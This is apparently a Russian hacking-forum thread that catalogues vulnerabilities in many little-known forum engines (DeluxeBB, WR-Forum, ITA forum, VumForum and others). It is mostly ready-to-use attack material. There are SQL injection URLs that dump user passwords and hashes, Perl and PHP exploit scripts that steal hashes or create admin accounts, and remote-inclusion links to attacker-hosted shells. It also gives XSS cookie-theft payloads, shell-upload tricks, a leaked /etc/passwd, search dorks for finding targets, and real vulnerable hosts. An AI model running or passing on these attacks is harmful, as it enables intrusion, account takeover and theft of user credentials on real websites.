Форумы [Обзор уязвимостей в форумных движках]

[Обзор уязвимостей в форумных движках]​

----------------------------------------------------------------

Так же обратите внимание на темы:

[Обзор уязвимостей Ipb]​

[Обзор уязвимостей phpBB]​

[Обзор уязвимостей vBulletin]​

[Обзор уязвимостей Ikonboard]​

[Обзор Уязвимостей Yabb]​

[Обзор уязвимостей myBB]​

[Обзор уязвимостей Phorum]​

[Обзор уязвимостей Woltlab Burning Board + Lite]​

[ Обзор уязвимостей miniBB ]​

Обзор уязвимостей PunBB​

Обзор уязвимостей IceBB​

[Обзор уязвимостей XMBForum]​

----------------------------------------------------------------

Эти темы так же могут быть вам полезны:

Бэкдорим форумы. Теория и практика!​

[FAQ + полезные ссылки]​

- в этой теме вы сможете найти ответы на наиболее частые вопросы.

----------------------------------------------------------------

В этой теме будут выкладываться уязвимости, разных не очень популярных форумных движков.

----------------------------------------------------------------

 

Форум: DeluxeBB
Версия: <= 1.06

Уязвимость в сценарие misc.php, из за недостаточной обработки данных в параметре name можно осуществить SQL инъекцию.

Code:

misc.php?sub=profile&name=0')+UNION+SELECT+1,concat(database(),char(58),version(),char(58),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

Пароль пользователя:

Code:

misc.php?sub=profile&name=0')+UNION+SELECT+1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+deluxebb_users+where+uid=1/*

где uid= - номер пользователя

Эксплойт:

Code:

#!/usr/bin/perl

# coded by k1b0rg

use LWP::UserAgent;
use strict;
my $site=$ARGV[0];
my $id=$ARGV[1];
my $browser = LWP::UserAgent->new() or die;
my $res=$browser->get($site.'misc.php?sub=profile&name=0\')+UNION+SELECT+1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+deluxebb_users+where+uid='.$id.'/*');

if($res->content=~m!<font class="misctext">([a-f0-9]{32})</font>!i)
{
print 'Hash for userid='.$id.': ['.$1.']';
}
else
{
print 'Exploit failed.';
}

Использование эксплойта:

путь к эксплойту сайт и путь до форума номер пользователя

c:\expl.pl http://site.com/forum/ 1

Сайт и путь до форума писать слитно:

http://site.com/forum/ - если форум в директорие forum
http://site.com/bb/ - если форум в директорие bb
http://site.com/ - если форум в корневом каталоге сайта

Резултат работы эксплойта - хеш (md5) пароля выбранного пользователя.

Пример уязвимости:

Code:

http://82.212.43.253/c_forum/misc.php?sub=profile&name=0')+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

Уязвимость под относительно старые форумы - всетреить такие можно не часто, особенно если учесть что сами движки форумов не сильно распространены.

------------------------------------------------------------------

Форум: DeluxeBB
Версия: <= 1.06

Из за недостаточной обработки данных в параметре templatefolder есть возможность осуществить php инклюдинг.

Уязвимых сценариев несколько:

Code:

http://site.com/templates/deluxe/postreply.php?templatefolder=[file]

http://site.com/templates/deluxe/posting.php?templatefolder=[file]

http://site.com/templates/deluxe/pm/newpm.php?templatefolder=[file]

http://site.com/templates/default/postreply.php?templatefolder=[file]

http://site.com/templates/default/posting.php?templatefolder=[file]

http://site.com/templates/default/pm/newpm.php?templatefolder=[file]

При проверки узявимости

Code:

http://site.com/templates/deluxe/postreply.php?templatefolder=123

вылезала ошибка из которой было видно что к строке добавляеться /posticons.php (т.е. в результате строка выглядела 123/posticons.php), что отлично исправляеться добавлением к строке %00, т.е. в результате запрос долже выглядить так:

Code:

http://site.com/templates/deluxe/postreply.php?templatefolder=[file]%00

 

Форум: DeluxeBB
Версия: <= 1.07

Для этой версии есть эксплойт для получения админских привилегий.

Эксплойт:

Code:

#!/usr/bin/perl
# DeluxeBB <= 1.07 Create Admin Exploit
#
## www.h4ckerz.com / www.hackerz.ir / www.aria-security.net
# ./2006-6-25
### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket; 
use LWP::UserAgent;
use HTTP::Cookies;


$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;

print q(
###########################################################
#          DeluxeBB <= 1.07 Create Admin Exploit          # 
#           www.hackerz.ir - www.h4ckerz.com              #
################### Coded By Hessam-x #####################

);



if (@ARGV < 3) {
print " #  usage : hx.pl [host&path] [uname] [pass]\n"; 
print " #  E.g : hx.pl www.milw0rm.com/deluxebb/ str0ke 123456\n"; 
  exit();
}

  
    print " [~] User/Password : $uname/$passwd \n";
    print " [~] Host : $host \n";
    print " [~] Login ... ";



# Login In DeluxeBB <= 1.07 Create Admin Exploit

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'misc.php',
Content => [
"sub" => "login",
"name" => "$uname",
"password" => "$passwd",
"submit" => "Log-in",
"redirect" => "",
"expiry" => "990090909",
],);

  if($cookie_jar->as_string =~ /memberpw=(.*?);/) { 
  print "successfully .\n";
  } else { 
  print "UNsuccessfully !\n";
  print " [-] Can not Login In $host !\n"; 
  print $cookie_jar->as_string;
  exit(); 
  }

  # Creat Admin :)

$req = $xpl->get($url.'cp.php?sub=settings&[email protected]&xhideemail=0
&xmsn=h4x0r\',membercode=\'5&xicq=&xaim=&xyim=&xlocation=&xsite=&languagex=
English&skinx=default&xthetimeoffset=0&xthedateformat=d.m.y&xthetimeformat=12
&invisiblebrowse=0&markposts=15&submit=Update');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin Cp/) { 
print " [+] You Are Admin Now !!";
} else {
    print " [-] Exploit Failed !";
    }

# milw0rm.com [2006-06-25]

Использование эксплойта:

путь к эксплойту сайт и путь до форума ваш логин ваш пароль

c:\expl.pl http://site.com/forum/ grey 123123

Сайт и путь до форума писать слитно:

http://site.com/forum/ - если форум в директорие forum
http://site.com/bb/ - если форум в директорие bb
http://site.com/ - если форум в корневом каталоге сайта

Резултат работы эксплойта - получение админских привилегий.

------------------------------------------------------------------

Форум: DeluxeBB
Версия: <= 1.9

Из за недостаточной обработки данных в параметре templatefolder есть возможность осуществить php инклюдинг.

На этот раз уязвим сценарий sig.php.

PHP:

<?php
if($settings['smilies']=='on')
{
include($templatefolder.'/smilies.php');
}
?>

Из кода видно что для инклюда необходимо вывполнение условия $settings['smilies']=='on', а так же наличие %00, т.к. к строке будет добавляться /smilies.php.

В результате:

Code:

http://site.com/templates/deluxe/cp/sig.php?settings[smilies]=on&templatefolder=[file]%00

где [file] - файл, который будет инклюдиться, а settings[smilies]=on присвоение переменной необходимого для инклюда значения.

 

Форум: WR-Форум
Версия: 1.8

Стандартный пароль который изначально стоит на форуме (на админку /admin.php) - admin. Конечно врятли что его не сменили но всё таки попробывать можно.

Есть несколько активных XSS.

В профиле в полях:

1. Откуда - скрипт будет срабатывать при просмотре страницы Участники.
2. Домашняя страничка - скрипт будет срабатывать при просмотре страницы Участники.

3. Подпись - скрипт будет срабатывать при просмотре сообщений в темах.

Вводим <script>alert();</script>

4. При регистрации создаём пользователя с именем <script>alert();</script> - почти на каждой странице будет срабатывать ваш код.

Куки пользователя выглядят примерно так:

wrfcookies=Grey%7C123%7C1176741104%7C1176741104%7C

%7C123%7C1176741104%7C1176741104%7C - это аски коды, если представить как символы то получиться, такая строка:

|123|1176741104|1176741104|

где |123| - пароль пользователя

Куки админа выглядят так:

frcookies=1%7Cadmin%7C1176740994%7C

Опять же если представить аски коды как символы то получиться:

1|admin|1176740994|

где |admin| - пароль к админ-центру

Видно что пароли не только не шифруються, но и храняться в куках, имею активную xss достать куки будет не сложно.

------------------------------------------------------------

Заливка шелла:

http://forum.antichat.ru/showpost.php?p=380128&postcount=18

------------------------------------------------------------

Скачать форум можно здесь: http://wr-script.ru/

Для поиска сайтов с таким форумом вводим: Powered by WR-Forum

Кстати сайтов с таким форумом не так уж и мало:

__http://www.google.ru/search?hl=ru&q=Powered+by+WR-Forum&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=

 

Форум: RonForum
Версия: v30

Доступ в админку:

Если открыть файл admin.php и посмотреть его содержимое, то можно встретить такую строку:

PHP:

if(isset($entrance) and $entrance=="1")

Эта строка идёт после проверки пароля вводе пароля, содержимого куков, но изначально никакого значения эта переменная не имеет, ей только присваиваеться значение в случае, если пароль введён правильно.

Переходим в админку:

http://site.com/from/admin.php

Теперь присваиваем переменной entrance необходимое значение 1:

http://site.com/from/admin.php?entrance=1

Теперь вы в админке, но есть не большой минус: при переходе по любой ссылке, значение переменной будет утеряно, что бы этого не случилось смотрим адрес ссылки, к примеру:

http://site.com/from/admin.php?what=moderators

и добавляем к ней необходмиое значение:

http://site.com/from/admin.php?entrance=1&what=moderators

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Copyright © Kwasnikov R.P

------------------------------------------------------------
------------------------------------------------------------

Форум: ParkerForum
Версия: 0.01

Активная XSS

В поле Сайт, при создание новой темы вводим <script>alert();</script> - скрипт будет выплняться при просмотре главной страницы форума, а так же при просмотре темы.

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Copyrights (C) by ademan

------------------------------------------------------------
------------------------------------------------------------

Форум: Древообразный форум
Версия: 1.0

Активная XSS

Уязвимы поля Name и Subject.

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Скрипт предоставлен www.chemport.ru

 

tForum <= b0.915
Форум малораспространённый, но всё же.

Активная XSS в поле "Message".

Code:

http://www.target/path/message.php

Вставляем в поле "Message":

Code:

[img]javascript:alert(document.cookie)[/img]

В кукисах сессия, логин.


Ссылка для поиска в Google:

Code:

_http://www.google.ru/search?hl=ru&newwindow=1&q=Powered+by%3A+tForum&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=

 

Форум: KerviNet
Версия: 1.1

Из-за отсутствия фильтрации параметров, есть возможность осуществить SQL инъекцию.

Сценарий topic.php.
Уязвим параметр forum.

------------

PHP:

$mysql->query("SELECT name FROM forums WHERE id_forum = ".$forum);

Параметр передаёться, как есть, без какой либо фильтрации.

------------

Делаем запрос к базе данных:

topic.php?forum=-1+union+select+1/*

Таблица с пользователями:

topic.php?forum=-1+union+select+1+from+users/*

Вывод логина, пароля и мыла пользователя:

topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(58),pass,char(58),email)+from+users/*

В результате запроса получаем: 1:TEST:123:[email protected]

где 1 - номер пользователя, TEST - имя пользователя, 123 - пароль пользователя, заметьте пароль храниться в незашифрованном виде, [email protected] - мыло пользователя
char(58) - это символ ':' который в нашем случае служит разделителем.

Перебор пользователей:

topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(58),pass,char(58),email)+from+users+limit+0,1/*
topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(58),pass,char(58),email)+from+users+limit+1,1/*
topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(58),pass,char(58),email)+from+users+limit+2,1/*

Code:

http://site.com/forum/topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(58),pass,char(58),email)+from+users+limit+0,1/*

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Copyright KerviNet © 2005-2007

------------------------------------------------------------
------------------------------------------------------------

Форум: XMB
Версия: 1.5

Активная XSS

Уязвим параметр MSN.

При регистрации пользователя в поле MSN вводим <script>alert();</script>, скрипт будет срабатывать при просмотре профиля пользователя.

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered by XMB

 

Форум: ITA forum
Версия: 1.21
Версия: 1.31
Версия: 1.49

Из-за отсутствия фильтрации параметров, есть возможность осуществить SQL инъекцию.

Сценарий showforum.php.
Уязвим параметр fid.

------------

PHP:

$trs = mysql_query("SELECT forumtitle, locked FROM itaf_forum WHERE forumid = '$fid'");

Параметр передаёться, как есть, без какой либо фильтрации.

------------

Делаем запрос к БД и в результате получам имя и хеш (mysql4) пароля пользователя:

Code:

http://site.ru/forum/showforum.php?fid='+union+select+concat(id,char(58),user_name,char(58),user_pass),2+from+itaf_user+limit+0,1/*

Перебираем пользователей:

Code:

http://site.ru/forum/showforum.php?fid='+union+select+concat(id,char(58),user_name,char(58),user_pass),2+from+itaf_user+limit+1,1/*
http://site.ru/forum/showforum.php?fid='+union+select+concat(id,char(58),user_name,char(58),user_pass),2+from+itaf_user+limit+2,1/*

------------

Для удобства написал небольшой слойт, который выдирает хеш пользователя (id пользователя задаёться):

PHP:

<?php

// coded by Grey

if($argc == 4)
{
$a = file('http://'.$argv[1].$argv[2].'showforum.php?fid=\'+union+select+user_pass,2+from+itaf_user+where+id='.$argv[3].'/*');
for($i = 0; $i < count($a); $i++)
{
if(eregi("[a-f0-9]{16,16}",$a[$i],$b))
{
echo("\n");
echo($b[0]);
echo("\n");
$t = 1;
break;
}
}
if($t != 1) { echo("Exploit failed"); }
}
else
{
echo("\n");
echo('Usage: '.$argv[0].' site dir user_id');
echo("\n");
echo('Usage: '.$argv[0].' site.ru /forum/ 1');
echo("\n");
}
?>

Использование сплойта:

php c:\exp.php site dir user_id

php c:\exp.php site.ru /forum/ 1

site - сайт
dir - директория с форумом
user_id - номер пользователя

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered By: V1.21
Для поиска сайтов с таким форумом вводим: Powered By: V1.31
Для поиска сайтов с таким форумом вводим: Powered By: V1.49

К сожалению можно встретить и пропатченную версию, в которой эта уязвимость исправленна.

------------------------------------------------------------
------------------------------------------------------------

Другие уязвимости:

1. Форум: ITA forum
Версия: 1.31 (возможно и другие версии)
Версия: 1.49 (возможно и другие версии)

Пассивная XSS:

Code:

http://site.ru/search.php?Submit=true&search="><script>alert(123);</script>

2. Форум: ITA forum
Версия: 1.49 (возможно и другие версии)

SQL инъекция:

Code:

http://site.ru/showuser.php?uid='+union+select+1,concat(user_name,char(58),user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+itaf_user/*

 

Форум: Board
Версия: 2.0

1. SQL инъекция

Сценарий view_all_topic.php.
Уязвим параметр m_id.

------------

PHP:

$sql2="select m_id as reply,name,email,msg,date_format(m_date,'%d.%m.%Y %T') as date, subject from $dbtable where r_id =$m_id order by date";
$result=mysql_query($sql2,$db);

Параметр передаёться, как есть, без какой либо фильтрации.

------------

Делаем запрос к БД в результате, логин, пароль (пароль не зашифрован) и мыло пользователя:

Code:

http://site.ru/forum/view_all_topic.php?m_id=-1+union+select+concat(id,char(58),name,char(58),password,char(58),email),2,3,4,5+from+board000_users/*

2. Пасивная XSS

В поиске вводим <script>alert();</script> - скрипт выпольнится.

3. Активная XSS

При создание темы/сообщения вписываем в поле заголовка сообщения или в текст сообщения <script>alert();</script> - скрипт будет выпольняться при ответе на данное сообщение/тему.

4. Возможность заходить от любого пользователя, без ввода пароля.

Смотрим содержимое куков:

board_user_cook=qwerty; board_user_id=3

board_user_cook - имя пользователя
board_user_id - номер пользователя

Теперь меняем эти значения:

К примеру есть пользователь max и его номер 1:

board_user_cook=max; board_user_id=1

Всё теперь вы пользователь max.

------------

В Опере значение куков менять так:

Инструменты - Дополнительно - Cookies

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Copyright ° CarLine 2002г.

Не смотря на то, что форум старый сайтов с таким форумом достаточно много.

------------------------------------------------------------
------------------------------------------------------------

Форум: ReForum
Версия: 1.0

SQL инъекция

Уязвим параметр viewth.

Code:

http://site.ru/forum/?viewth=2
http://site.ru/forum/index.php?viewth=2

------------------------------------------------------------

 

Форум: Trofimov forum
Версия: v1.2

Активная XSS в поле Имя.

Скрипт срабатывает после добавления темы (страница forum.php).

------------------------------------------------------------
------------------------------------------------------------

Форум: TROforum
Версия: 0.3

Из-за не коректной обработки параметров, можно войти в админку имея только пароль:

PHP:

if ($password != "$admin_login" && $password != "$admin_password")

Как видно из этой строки войти в админку можно имея вместо пароля логин.
Изначально логин - login.

Но перед этим условием стоит условие:

PHP:

if ($password != "$admin_login" && $password != "$admin_password")

Само условие не верно, т.к. оно звучит так: Если Логин И Пароль не верны, то прекратить выполнение скрипта.

Из условия следует, что если только логин или пароль будет неверным, то работу скрипта прекращать не следует.

Имя только логин (а его угадать проще(login, admin или просто имя админа)), можно получить полный доступ к админке:

Code:

http://site.ru/forum/admin/admin.php?login=login&password=login

Таким образом переменным login и password присваиваются необходимые для входа значения.

Но здесь всё проще - файл настроек не требует авторизации:

Code:

http://site.ru/forum/admin/update.php

А именно в этом файле хранятся Логин и Пароль, сменить которые не составит труда.

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered by: TROforum 0.3

 

Форум: pHpAS
Версия: 1.26

1. Активная XSS.

1) При ответе в теме в поля Title и Name вставляем скрипт <script>alert();</script>.

Скрипт будет выполняться при про смотре коментариев.

2) При создание темы (/admin - пароль здесь не нужен) в полях Title и Text вводим <script>alert();</script>.

Скрипт будет выполнятся как на странице admin/index.php так и на /index.php.

2. SQL инъекция.

Уязвимость в сценарие show.php в параемтре id.

Code:

http://site.ru/forum/show.php?id=-1+union+select+1,2,3,4/*

Не смотря на то, что на форуме нет пользователей, сама sql инъекция даёт возможность обращаться к другим таблицам (к примеру к таблицам, используемым движком сайта).

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered By: pHpAS 1.26

------------------------------------------------------------
------------------------------------------------------------

Форум: electrifiedForum
Версия: v1.70

1. Пасивная XSS.

Code:

http://site.ru/forum/index.php?action=displaythread&forum=chat&id=<script>alert();</script>

Есть еще одна но, она будет выполняться только с админскими привилегиями:

Code:

http://site.ru/forum/index.php?action=userinfo&user=<script>alert();</script>

2. Активная XSS.

1) В личке в поле Subject пишем <script>alert();</script>, скрипт будет выполняться при просмотре личной почты.

2) В профиле в подписе (Signature) пишем <script>alert();</script>, скрипт будет выполняться при просмотре сообщений на форуме.

3) На форуме при создание темы в поле Title пишем <script>alert();</script>, скрипт будет выполняться при ответе на сообщение.

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered By electrifiedForum v1.70

 

Форум: He11.net Forums
Версия: 1.0

1. Пасивная XSS.

Code:

http://site.ru/forum/index.php?top_message=<script>alert();</script>

2. SQL инъекция.

1)

Code:

http://site.ru/forum/profile.php?id=-1+union+select+1,concat(id,char(58),username,char(58),password,char(58),uncrypt_pass),3,4,5,6,7,8,9,10,11,12+from+Dragon_users/*

в результате получаем строку вида:

1:grey:202cb962ac59075b964b07152d234b70:123

В базе данных хранится и зашифрованный пароль (md5) и пароль в чистом виде.

2)

Code:

http://site.ru/forum/view_thread.php?id=-1+union+select+1,2,3,4,concat(id,char(58),username,char(58),password,char(58),uncrypt_pass),6,7,8,9+from+Dragon_users/*

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: "View Today's Active Topics"

Пример уязвимого форума:

__http://sims2.h10.ru/forum/profile.php?id=-1+union+select+1,concat(id,char(58),username,char(58),password,char(58),uncrypt_pass),3,4,5,6,7,8,9,10,11,12+from+Dragon_users/*

------------------------------------------------------------
------------------------------------------------------------

Форум: UBB Threads
Версия: 5.5

Пассивная XSS:

Code:

http://site.ru/showprofile.php?Cat=&User=<script>alert();</script>

Активная XSS:

При создание сообщения на форуме в поле Сообщение вписываем скрипт, скрипт будет выполняться при просмотре темы.

Заливка шелла:

Заходим в админку - Includes, редактируем (вписываем шелл) любой из файлов (Header, Footer и т.д.).

Шелл будет доступен по адресу:

http://site.ru/includes/header.php

 

Форум FastBB 9.20

1. Возможности писать в закрытые темы.

Необходимо зайти в закрытую тему, в адресной строке поменять №1 на №6 - и
попадаешь на страницу создания сообщения. Пишешь сообщение, отправляешь и оно
появляется в теме.

 

Форум: Ultimate PHP Board

Необходимо зарегестрироватся.Регестрируемся и запоминаем что мы написали.
Теперь самое интересное - использование уязвимости. Баг в форуме в том что у всех зарегестрированных пользователей есть права на просмотр файлов:
_http://www.forum.de/forum/admin.php - панель администратора.
_http://www.forum.de/forum/admin_forum.php - администрирование форумами.
_http://www.forum.de/forum/admin_members.php - позволяет редактировать пользователей.
_http://www.forum.de/forum/admin_config.php - панель настройки форума.
Идем на _http://www.forums.de/forum/admin_members.php и перед нами список пользователей. Ставим себе права админа, перезаходим, удаляем бывших админов и форум ваш!

 

Форум: Anyboard все версии
Локальный инклуд файлов в параметре vf
Например на сайте производителя:

Code:

[COLOR=DarkOrange]http://www.anyboard.net/cgi-bin/anyboard.cgi/rec/Party_and_Poultry_Information_Exchange/-=ab=-/index.html?cmd=retr&vf=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D[/COLOR]

Code:

______________________________________________
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
http://www.google.ru/search?q=inurl:?cmd=retr
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
alias:x:500:500::/var/qmail/alias:/bin/bash
qmaild:x:501:500::/var/qmail:/bin/bash
qmaill:x:502:500::/var/qmail:/bin/bash
qmailp:x:503:500::/var/qmail:/bin/bash
qmailq:x:504:501::/var/qmail:/bin/bash
qmailr:x:505:501::/var/qmail:/bin/bash
qmails:x:506:501::/var/qmail:/bin/bash
vpopmail:x:507:502::/home/vpopmail:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
exim:x:93:93::/var/spool/exim:/sbin/nologin
________________________________________________

 

XSS уязвимость на Intellect Board 2.12

XSS уязвимость на Intellect Board 2.12

Была найдена XSS уязвимость в форумном движке Intellect Board 2.12.
Устранение: Обновить скрипты.
Уязвимость: можно в качестве адреса домашней страницы или ЖЖ поставить javascript:. А дальше - классическая XSS: перехватываем идентификатор сессии админа и влезаем в АЦ. Правда, сделать это не так уж и просто: по умолчанию там выполняется привязка сессии к HTTP_USER_AGENT, да и время жизни сессии ограничено несколькими часами.

 

ExBB
Описание:Баг из-за недостаточной проверки подключаемых файлов в скрипте usertstop.php
Эксплоит : http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://yourshell

VistaBB <= 2.x
Описание:Баг в проверке передаваемого юзером поля Cookie в HTTP-запросе
Позволяет выполнять произвольные команды
Эксплоит : http://milw0rm.com/exploits/2251

Woltlab Burning Board 2.3.5
Описание:Баг в модуле links.php приводит к выполнению произвольных sql-запросов
Эксплоит : http://milw0rm.com/exploits/2197
Эксплоит : http://milw0rm.com/exploits/1810

MiniBB <=1.5
Описание:Через уязвимый скрипт com_minibb.php можно загрузить шелл на уязвимую машину
Эксплоит : http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?

MyBB < 1.1.3
Описание:Эксплоит позволяет выполнять произвольные команды на сервера
Эксплоит :http://milw0rm.com/exploits/1909

PHORUM 5
Описание:Эксплоит работает с register_globals=On и magic_quotes_gpc=Off
Эксплоит : http://milw0rm.com/exploits/2008

UBB Threads

1.UBBThreads 5.x,6.x
Описание:Работает с register_globals on
Уязвимый скрипт ubbt.inc.php позволяет просматривать файлы на сервере

2.UBB.threads >= 6.4.x
Описание:Баг в скрипте голосования позволяет выполнять произвольные команды через скрипт атакующего
Эксплоит : */addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id

Zix Forum
Описание:Передаваемый параметр "layid" недостаточно проверяется в скрипте 'settings.asp' что приводит к sql-inj
Эксплоит : site.com/zix/login.asp?layid=-1%20union%20select% 201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
Эксплоит : site.com/zix/main.asp?layid=-1%20union%20select% 201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,nu
ll,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'

qjForum

Описание:Недостаточная обработка поля "uName" в скрипте 'member.php'
Для выполнения эксплоита надо залогиниться на форум
Эксплоит : http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member

tinyBB <= 0.3
Описание:Ошибка в скрипте 'footers.php',позволяющая залить шелл
Эксплоит : http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?

FunkBoard

Описание:Уязвимость в скрипте profile.php позволяет сменить пасс выбранного юзера
Эксплоит : http://milw0rm.com/exploits/1875

QBoard <= v.1.1
Описание:Ошибка в скрипте 'post.php',позволяющая залить шелл
Эксплоит : http://www.site.com/[QBoard_path]/board/post.php?qb_path=[evil_scripts]

FlashBB <= 1.1.5
Описание:Ошибка в скрипте 'getmsg.php',позволяющая залить шелл
Эксплоит : http://milw0rm.com/exploits/1921

LiteForum 2.1.1
Описание:Эксплоит-переборщик хеша пароля
Эксплоит : http://rst.void.ru/download/r57lite211.txt

Forum Russian Board 4.2
Описание:Выполнение произвольных команд через уязвимый скрипт 'admin/style_edit.php'
Эксплоит : http://rst.void.ru/download/r57frb.txt

OpenBB 1.0.5
Описание:SQL-иньекция через нефильтруемый параметр CID
Эксплоит : http://rst.void.ru/download/r57openbb.txt

Gravity Board X v1.1
Описание:Выполнение произвольных команд через уязвимый скрипт 'editcss.php'
Эксплоит : http://rst.void.ru/download/r57gravity.txt

Zorum forum
Описание:выполнение SQL-иньекции через нефильтруемый параметр 'rollid'
Эксплоит : http://rst.void.ru/download/r57zor.txt

 

Форум: WR-Форум
Версия: 1.8

------------------------------------------------------------

Про уязвимости форума читать тут:

http://forum.antichat.ru/showpost.php?p=339251&postcount=4 - (активные XSS)

------------------------------------------------------------

Заливка шелла (через админку):

Заходим в админку -> Настройки, в поле Описание (или в поле Е-майл администратора) вписываем код шелла следующим образом:

";?> <? Код шелла ?> <? //

к примеру сделам вывод строки 123123:

";?> <? echo(123123); ?> <? //

Шелл будет доступен по адресу:

http://site.ru/forum/config.php

При внедрение кода работа форума нарушена не будет.

 

Форум: VumFOrum
Версия: v2.5

Пасcивная XSS:

Code:

http://site.ru/?forum=profile&user=<script>alert();</script>

Активная XSS:

1) В поле Сообщение вводим скрипт, скрипт будет выполняться при просмотре темы.

2) При регистрации пользователя в поле Url вводим текст скрипта, скрипт будет выполняться при просмотре профиля пользователя.

Заливка шелла:

Способ 1:

При создание темы/сообщения прикрепляем файл - шелл.

Шелл будет доступен по адресу:

http://site.ru/upload/shell.php

Способ 2:

При регистрации на форуме, в поле Имя введите ../shell.php, в поле пароль и его подтверждение введите 1, в поле Mail 1@1, в поле Url введите код шелла (к примеру <? echo(1); ?>).

Шелл будет доступен по адресу:

http://site.ru/shell.php

Если прав на заливку шелла в эту директорию не хватит, то можно попробывать залить шелл в директорию upload:

При регистрации на форуме, в поле Имя введите ../upload/shell.php, в поле пароль и его подтверждение введите 1, в поле Mail 1@1, в поле Url введите код шелла (к примеру <? echo(1); ?>).

Шелл будет доступен по адресу:

http://site.ru/upload/shell.php

 

Форум: SMDS Forum
Версия: v.2.1 rus

Локальный инклуд:

Code:

http://site.ru/Files/all_forums.php?file_read_forums=[file]

Code:

http://site.ru/Files/write_log.php?file_read_logs=[file]

Code:

http://site.ru/Files/statistic.php?file_read_statistic=[file]

Code:

http://site.ru/Files/downloads.php?file_read_downl=[file]
http://site.ru/Files/downloads.php?file_add_downloads=[file]

Пассивные XSS:

Code:

http://site.ru/Files/buttons.php?forum_ext=1&language[but_index]=<script>alert();</script>

Code:

http://site.ru/Files/downloads.php?td_all=<script>alert();</script>

Code:

http://site.ru/Files/downloads.php?table_all=<script>alert();</script>

Code:

http://site.ru/Files/faq.php?vars[your_email]=<script>alert();</script>

Заливка шелла:

В админке, добавляем к разрешённым расширениям файлов php, закачиваем шелл, шелл будет доступен по адресу:

http://site.ru/Downloads/shell.php